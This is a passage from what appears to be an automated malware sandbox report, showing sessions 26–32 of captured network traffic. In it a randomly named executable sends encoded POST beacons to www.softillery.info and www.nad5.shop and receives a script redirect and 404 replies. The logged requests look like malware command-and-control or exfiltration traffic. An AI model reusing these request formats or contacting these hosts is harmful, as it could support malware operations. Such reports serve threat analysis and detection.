                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 33 48 7a 4a 31 6f 50 30 78 4f 4d 4a 52 49 63 72 55 30 45 2b 6b 76 59 61 4b 75 67 67 4c 63 54 34 7a 52 50 53 2b 71 6e 47 53 70 57 68 65 54 46 4d 69 38 4b 4f 6b 48 6f 2f 57 52 61 43 4e 6b 70 59 56 56 64 65 79 42 6a 68 78 58 41 33 73 68 54 73 55 6a 4b 6c 57 42 79 38 4a 6b 6e 72 78 5a 30 53 4f 62 58 58 73 33 7a 56 30 66 2b 63 65 6f 6c 30 4f 68 62 7a 72 72 2f 2b 36 2f 71 74 35 4a 65 75 68 6a 4f 73 6e 6a 34 76 71 37 57 69 32 4d 70 63 4c 36 46 45 66 49 2b 6a 4d 56 73 46 75 75 34 47 39 37 66 6c 43 54 4d 7a 37 36 50 4c 43 57 73 37 61 63 74 62 61 4e 76 4a 56 78 45 6b 7a 78 47 2f 62 67 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=3HzJ1oP0xOMJRIcrU0E+kvYaKuggLcT4zRPS+qnGSpWheTFMi8KOkHo/WRaCNkpYVVdeyBjhxXA3shTsUjKlWBy8JknrxZ0SObXXs3zV0f+ceol0Ohbzrr/+6/qt5JeuhjOsnj4vq7Wi2MpcL6FEfI+jMVsFuu4G97flCTMz76PLCWs7actbaNvJVxEkzxG/bg==


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  26192.168.2.4500333.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:27.035609007 CEST819OUTPOST /xia9/ HTTP/1.1
                                                                                                                                  Host: www.softillery.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.softillery.info
                                                                                                                                  Referer: http://www.softillery.info/xia9/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 33 48 7a 4a 31 6f 50 30 78 4f 4d 4a 53 72 45 72 53 56 45 2b 68 50 59 62 42 4f 67 67 41 38 54 38 7a 51 7a 53 2b 6f 4b 42 53 2f 4f 68 66 79 31 4d 6a 35 2b 4f 33 33 6f 2f 59 78 61 48 4a 6b 70 48 56 56 68 67 79 45 44 68 78 57 67 33 73 6c 58 73 55 51 69 71 58 52 79 2b 43 45 6e 74 2b 35 30 53 4f 62 58 58 73 7a 66 37 30 66 6d 63 64 59 56 30 50 45 75 6c 6d 4c 2f 78 71 66 71 74 75 5a 65 71 68 6a 4f 65 6e 69 6c 6e 71 2b 53 69 32 4f 78 63 50 2f 70 46 57 49 2b 68 43 31 74 74 2f 50 45 49 6b 4a 61 39 41 51 73 73 30 4c 44 33 4b 77 39 68 4c 74 4d 4d 49 4e 4c 36 49 32 4e 51 2b 79 37 32 41 70 69 34 42 52 4f 50 62 74 2b 41 45 30 43 75 2f 72 37 38 67 63 6b 3d
                                                                                                                                  Data Ascii: kf-HBx=3HzJ1oP0xOMJSrErSVE+hPYbBOggA8T8zQzS+oKBS/Ohfy1Mj5+O33o/YxaHJkpHVVhgyEDhxWg3slXsUQiqXRy+CEnt+50SObXXszf70fmcdYV0PEulmL/xqfqtuZeqhjOenilnq+Si2OxcP/pFWI+hC1tt/PEIkJa9AQss0LD3Kw9hLtMMINL6I2NQ+y72Api4BROPbt+AE0Cu/r78gck=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  27192.168.2.4500343.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:30.577044010 CEST10901OUTPOST /xia9/ HTTP/1.1
                                                                                                                                  Host: www.softillery.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.softillery.info
                                                                                                                                  Referer: http://www.softillery.info/xia9/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 33 48 7a 4a 31 6f 50 30 78 4f 4d 4a 53 72 45 72 53 56 45 2b 68 50 59 62 42 4f 67 67 41 38 54 38 7a 51 7a 53 2b 6f 4b 42 53 2f 47 68 66 45 68 4d 6a 61 57 4f 30 33 6f 2f 48 42 61 47 4a 6b 70 4f 56 56 35 6b 79 45 48 75 78 53 51 33 2b 51 44 73 53 68 69 71 5a 52 79 2b 4e 6b 6e 6f 78 5a 30 39 4f 62 48 54 73 7a 76 37 30 66 6d 63 64 61 4e 30 47 78 61 6c 31 62 2f 2b 36 2f 71 68 35 4a 65 57 68 6a 32 30 6e 6a 52 33 71 4b 6d 69 32 75 68 63 4e 70 64 46 5a 49 2b 2f 46 31 74 31 2f 50 4a 4b 6b 4a 47 78 41 52 49 4b 30 4c 48 33 50 77 34 75 66 38 45 32 65 37 66 48 62 57 39 38 6c 44 4f 36 49 36 2b 61 50 7a 2b 42 59 76 71 66 46 48 66 43 6a 62 54 62 33 59 71 4f 49 32 39 38 67 72 55 35 77 4c 56 4c 2b 74 37 79 55 4b 38 41 78 46 7a 2f 55 35 54 4c 30 45 58 65 53 35 31 67 6a 51 7a 64 32 4d 38 54 77 39 70 7a 51 2b 67 66 65 33 5a 78 35 6e 4d 74 48 70 53 76 61 4c 38 2f 52 6d 45 63 48 43 44 6a 77 55 67 4a 34 73 6d 41 78 4d 73 6b 37 58 42 78 56 6e 71 6f 5a 70 4c 55 5a 39 46 61 7a 76 2b 33 4a 74 6e 73 37 34 57 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=3HzJ1oP0xOMJSrErSVE+hPYbBOggA8T8zQzS+oKBS/GhfEhMjaWO03o/HBaGJkpOVV5kyEHuxSQ3+QDsShiqZRy+NknoxZ09ObHTszv70fmcdaN0Gxal1b/+6/qh5JeWhj20njR3qKmi2uhcNpdFZI+/F1t1/PJKkJGxARIK0LH3Pw4uf8E2e7fHbW98lDO6I6+aPz+BYvqfFHfCjbTb3YqOI298grU5wLVL+t7yUK8AxFz/U5TL0EXeS51gjQzd2M8Tw9pzQ+gfe3Zx5nMtHpSvaL8/RmEcHCDjwUgJ4smAxMsk7XBxVnqoZpLUZ9Fazv+3Jtns74Wx7PUkPuQ75EqMynlsvdIAfbWz/+GceG3a+WA8+3HF9JoZv3Ku4xmkRhkusw5PKZsf/2YZdsnl9IuB/UC7k9t9VdhvypEaC5fs4Lyvn8l2n9REO2rYSa5x30h18hqD52eoNX1ABQIGq0ALZ89j9DLUQyeP9/4cz39UE2a27gPpSBNKZAQG7eUy2UagyECPh30d00Vxu4w9KxAkvK/LbYGLiA5wpSeM6brEpsYEiZ2Tb081KY8eEhucMmSnxdFVIT/gwUjSfjTg/AHqQjt3/1xNbMzbv1s+X3HBrTAzRDxEAX8UsUSPzNkqkwDyGjrWP4sFABZ1JxrQdjF3F1T9xGCHs8IKQcc+iDq85QoNnon6UoGAWRhA32V67Qa1t+AdOs4SsKHFJ+Jjw7+1TtNti5ousvZQ9+LRPS2jiUiHhvrNdQuJF77tzx8w6pQkolY7d4lK0zgFj6zChK5lDTNFA+GycSNVALQFQea4tdBZFcmBJUwZqsjCp9CEK++P/0+3+bi5PzYiJOI0udmAN4MqVcRPB9vkUHiHe05mFXnO7N3cJYMKscWwx6W9EMvcUVcL4rs741c+cNblrhRTf3gZslOta4KA3PGMRu7gO32Cja6r2+JQ0ZstCoFsyr/OzFJpcA5nwRDiGZ+RDAm1kgYBY7ruVrMM7LmxkQ2PZ [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  28192.168.2.4500353.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:33.122854948 CEST524OUTGET /xia9/?kf-HBx=6Fbp2c2euLl3IpV1eF5M890ZMvcTOf/3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JQiLPTXJhO4ROr3CrWHqyrvdf750Ozu+jso=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.softillery.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:03:33.751420021 CEST394INHTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:33 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 254
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6b 66 2d 48 42 78 3d 36 46 62 70 32 63 32 65 75 4c 6c 33 49 70 56 31 65 46 35 4d 38 39 30 5a 4d 76 63 54 4f 66 2f 33 6b 54 33 2f 32 35 36 43 4b 6f 69 6d 61 41 70 41 68 35 6d 68 74 6e 5a 6b 62 51 4f 79 4d 48 56 43 52 77 42 4c 6e 45 37 32 6f 79 78 56 6d 77 50 57 56 52 4b 33 4a 51 69 4c 50 54 58 4a 68 4f 34 52 4f 72 33 43 72 57 48 71 79 72 76 64 66 37 35 30 4f 7a 75 2b 6a 73 6f 3d 26 6f 46 41 3d 5f 7a 35 78 39 42 35 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?kf-HBx=6Fbp2c2euLl3IpV1eF5M890ZMvcTOf/3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JQiLPTXJhO4ROr3CrWHqyrvdf750Ozu+jso=&oFA=_z5x9B5"}</script></head></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  29192.168.2.450036156.226.22.233801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:47.209918976 CEST781OUTPOST /moqb/ HTTP/1.1
                                                                                                                                  Host: www.nad5.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.nad5.shop
                                                                                                                                  Referer: http://www.nad5.shop/moqb/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 30 51 63 73 69 54 77 57 68 35 6b 59 67 49 66 46 52 58 30 6a 4a 48 48 6f 65 71 4e 48 45 6c 76 51 73 57 4d 6c 52 51 33 68 68 4f 79 36 33 5a 62 4e 38 38 31 53 4a 63 42 76 4f 4b 32 66 74 77 6f 44 58 51 79 4f 49 72 39 45 4c 61 30 34 64 6b 77 5a 4b 58 34 53 2f 6b 75 41 6a 52 31 73 38 49 68 74 37 34 36 56 31 6b 2f 4b 34 32 39 76 57 62 53 37 71 38 6e 53 4d 4c 79 54 77 42 57 68 53 77 77 4a 62 4c 78 70 43 65 73 79 5a 79 39 55 55 38 5a 53 71 4c 44 55 52 57 35 4a 69 65 50 62 59 2f 50 64 65 58 6c 31 74 59 36 34 6e 49 57 51 72 74 47 4f 58 7a 75 47 61 31 70 6a 76 4d 4e 4b 47 51 4a 52 30 41 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=0QcsiTwWh5kYgIfFRX0jJHHoeqNHElvQsWMlRQ3hhOy63ZbN881SJcBvOK2ftwoDXQyOIr9ELa04dkwZKX4S/kuAjR1s8Iht746V1k/K429vWbS7q8nSMLyTwBWhSwwJbLxpCesyZy9UU8ZSqLDURW5JiePbY/PdeXl1tY64nIWQrtGOXzuGa1pjvMNKGQJR0A==
                                                                                                                                  Oct 24, 2024 08:03:48.209170103 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:47 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  30192.168.2.450037156.226.22.233801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:49.753036022 CEST801OUTPOST /moqb/ HTTP/1.1
                                                                                                                                  Host: www.nad5.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.nad5.shop
                                                                                                                                  Referer: http://www.nad5.shop/moqb/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 30 51 63 73 69 54 77 57 68 35 6b 59 68 70 76 46 58 32 30 6a 42 48 48 72 52 4b 4e 48 4f 46 76 55 73 57 77 6c 52 53 62 49 67 39 61 36 32 39 58 4e 39 39 31 53 4b 63 42 76 57 61 32 57 70 77 6f 4d 58 51 75 47 49 75 64 45 4c 61 77 34 64 68 4d 5a 4b 6d 34 64 74 6b 75 43 72 78 31 75 68 59 68 74 37 34 36 56 31 6b 71 58 34 79 52 76 57 4c 69 37 6f 64 6e 64 46 72 79 51 67 68 57 68 46 67 77 7a 62 4c 77 4d 43 62 45 49 5a 77 46 55 55 2b 78 53 74 61 44 58 62 57 35 50 74 2b 4f 55 5a 36 71 33 65 33 41 6d 69 36 7a 65 74 36 69 50 6e 4c 58 55 47 43 50 52 49 31 4e 51 79 4c 45 2b 4c 54 30 59 76 45 48 36 2f 6d 4f 48 36 6b 6c 74 32 6f 53 62 53 6c 33 75 37 58 45 3d
                                                                                                                                  Data Ascii: kf-HBx=0QcsiTwWh5kYhpvFX20jBHHrRKNHOFvUsWwlRSbIg9a629XN991SKcBvWa2WpwoMXQuGIudELaw4dhMZKm4dtkuCrx1uhYht746V1kqX4yRvWLi7odndFryQghWhFgwzbLwMCbEIZwFUU+xStaDXbW5Pt+OUZ6q3e3Ami6zet6iPnLXUGCPRI1NQyLE+LT0YvEH6/mOH6klt2oSbSl3u7XE=
                                                                                                                                  Oct 24, 2024 08:03:50.707211018 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:50 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  31192.168.2.450038156.226.22.233801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:52.297502041 CEST10883OUTPOST /moqb/ HTTP/1.1
                                                                                                                                  Host: www.nad5.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.nad5.shop
                                                                                                                                  Referer: http://www.nad5.shop/moqb/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 30 51 63 73 69 54 77 57 68 35 6b 59 68 70 76 46 58 32 30 6a 42 48 48 72 52 4b 4e 48 4f 46 76 55 73 57 77 6c 52 53 62 49 67 39 43 36 32 4f 66 4e 38 65 4e 53 4c 63 42 76 49 4b 32 54 70 77 6f 72 58 51 6d 43 49 75 42 75 4c 59 34 34 48 45 41 5a 4d 56 67 64 33 30 75 43 6e 52 31 6a 38 49 68 43 37 35 57 52 31 6b 36 58 34 79 52 76 57 4e 75 37 68 73 6e 64 4a 4c 79 54 77 42 57 31 53 77 78 39 62 4b 55 36 43 62 41 59 65 41 6c 55 55 65 42 53 73 6f 72 58 54 57 35 4e 71 2b 50 4c 5a 36 75 73 65 33 63 71 69 37 47 37 74 35 2b 50 32 66 53 72 63 6a 6e 58 62 56 46 30 73 38 73 6b 45 42 51 2b 75 56 37 55 35 54 57 6b 75 67 6c 6e 2b 4b 4c 68 57 33 54 75 6c 51 34 33 36 36 55 59 5a 30 74 57 62 33 41 42 49 47 42 52 73 74 54 59 32 2b 65 64 71 41 32 4d 74 47 4a 45 53 44 70 50 4c 61 36 35 41 56 42 32 2f 44 52 70 57 47 78 38 4a 50 65 4f 63 6b 64 45 4f 58 44 5a 56 6e 35 47 77 6d 58 6b 38 56 6a 2b 31 2f 33 52 47 4f 30 41 47 59 46 78 2f 79 37 47 71 44 79 5a 6c 6d 76 58 69 57 69 2b 78 43 4a 46 6a 42 50 74 32 4d 69 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=0QcsiTwWh5kYhpvFX20jBHHrRKNHOFvUsWwlRSbIg9C62OfN8eNSLcBvIK2TpworXQmCIuBuLY44HEAZMVgd30uCnR1j8IhC75WR1k6X4yRvWNu7hsndJLyTwBW1Swx9bKU6CbAYeAlUUeBSsorXTW5Nq+PLZ6use3cqi7G7t5+P2fSrcjnXbVF0s8skEBQ+uV7U5TWkugln+KLhW3TulQ4366UYZ0tWb3ABIGBRstTY2+edqA2MtGJESDpPLa65AVB2/DRpWGx8JPeOckdEOXDZVn5GwmXk8Vj+1/3RGO0AGYFx/y7GqDyZlmvXiWi+xCJFjBPt2MipNYJBBW+gvidrS3W0rIG4N1fNU9Xk5gIiUAEYwXT9XnHi5di+RANvsAn2tpQZ3DBnHRpTIaEVQ/onbjAq3UoaW/IoeJSvwYX4v4ezzsYWA+YijfO2k/Uxv4jIRPVozjbapQx4NVgA4WS3lbiH5W/kHxEE5xmBrt0WTU4svX+ca9pzxPZxBtNCNRCAQpQ4/WfjL88AMSDZB8Jta7x6OaHmUEdqEdFgHhUwlstPfpknn1Iqb4Zb04EhGz6exBgeUu3dma8jfBCPruJ5grPUUg/Ris+dEbvFGy3aLu5s+q1V8DmTrIRqt2dQ25CCE3dmgvyawIhAtjaD+zaCgoM4jRgLBP1KAOitqq3/w9bMTOJc15SPRNYdfJmHaJOzQ0TdtXCMS2ORjVm2x7OzAKEv9LvsMsVyDHig8gvg58EjisrUvLMEjOSMgVt+hiKYPxZ8xDXJFt4rH4FIWFzFrQ/z8LIM1Kg9VjSjf69H0YnnLjrIeofGdRImZdeT4lwRM1vl5GrtR5RTlVMXC6div8qZoM3XHVa4JjG+aK2Tq2Jp4C5NuuYKStepVd9eNytQYW3Kqjd7fwIHyPg2KKZy0REvbfbLzaxaLcF8oitn4kjndLcZMWWc5xKxf7eqeKh6wrr0i7U7NRmh4vbmFFWQg6n/AKuxgI2TEQYMqe+5V [TRUNCATED]
                                                                                                                                  Oct 24, 2024 08:03:53.452917099 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:53 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  32192.168.2.450039156.226.22.233801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
